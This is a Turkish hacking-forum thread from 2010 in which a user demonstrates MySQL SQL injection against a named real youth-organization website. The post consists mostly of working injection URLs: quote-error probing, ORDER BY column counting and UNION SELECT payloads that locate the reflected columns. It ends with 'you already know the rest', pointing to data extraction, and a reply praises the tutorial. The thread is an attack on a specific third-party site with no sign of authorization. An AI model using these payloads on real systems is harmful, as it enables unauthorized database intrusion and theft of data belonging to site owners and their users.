İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Mysql Inj. Küçük Ayrıntılar

18-09-2010 02:15
#1
CaLLouS - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
01/2009
Mesajlar:
3.027
Teşekkür (Etti):
191
Teşekkür (Aldı):
1190
Konular:
1076
Ticaret:
(0) %
Örnek üzerinde göstermek istiyorum.

http://www.eeyouth.org/en/result.php?id=37'

Sitemiz bu. ' atarak hatamızı aldık. order+by ile devam ediyoruz.

http://www.eeyouth.org/en/result.php?id=37+order+by+999--

İlerledik baya hiç hata alamıyoruz, hatta 999 yazdım hala hata yok. Demekki biraz kurcalamamız lazım.

http://www.eeyouth.org/en/result.php?id=37+and+1=0+order+by+999--

Tık yok. Devam.

http://www.eeyouth.org/en/result.php?id=37+order+by+1+'1'='1--

Hata alıyoruz ama kolunu 1 vermemize rağmen! O hata da en sondaki pozisyondan kaynaklanıyor. O zaman bizde union ile devam edelim böyle kolonları bulamadık.

http://www.eeyouth.org/en/result.php?id=-888+union+all+select+1+and+'1'='1--

id yazan yerden sonra - ekliyoruz.Garanti olsun. id değerini 888 yapalım. Maksat sayfada olamayan bir değer olarak görsün. Evet kolon sayımızı artırıyoruz.

http://www.eeyouth.org/en/result.php
?id=-888'+UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25
,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,4 2,43,44,45,46,47,48,49,50+and+'1'='1--


50'ye kadar ilerledik. Devamlı hata aldık. Hiç rakam vurmadı.Şimdi 888 den sonra ' atalım bir de öyle deneyelim.


http://www.eeyouth.org/en/result.php?id=-888'+UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+and+'1'= '1--

Sonunda oldu. 5 ve 7 kısımlarını kullanabiliriz. Gerisini zaten biliyorsunuz.

Selametle...

19-09-2010 16:13
#2
Üyelik tarihi:
05/2010
Nereden:
FF
Mesajlar:
1.861
Teşekkür (Etti):
102
Teşekkür (Aldı):
463
Konular:
572
Ticaret:
(0) %
anLatım GüzeLmiş Kardesim.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı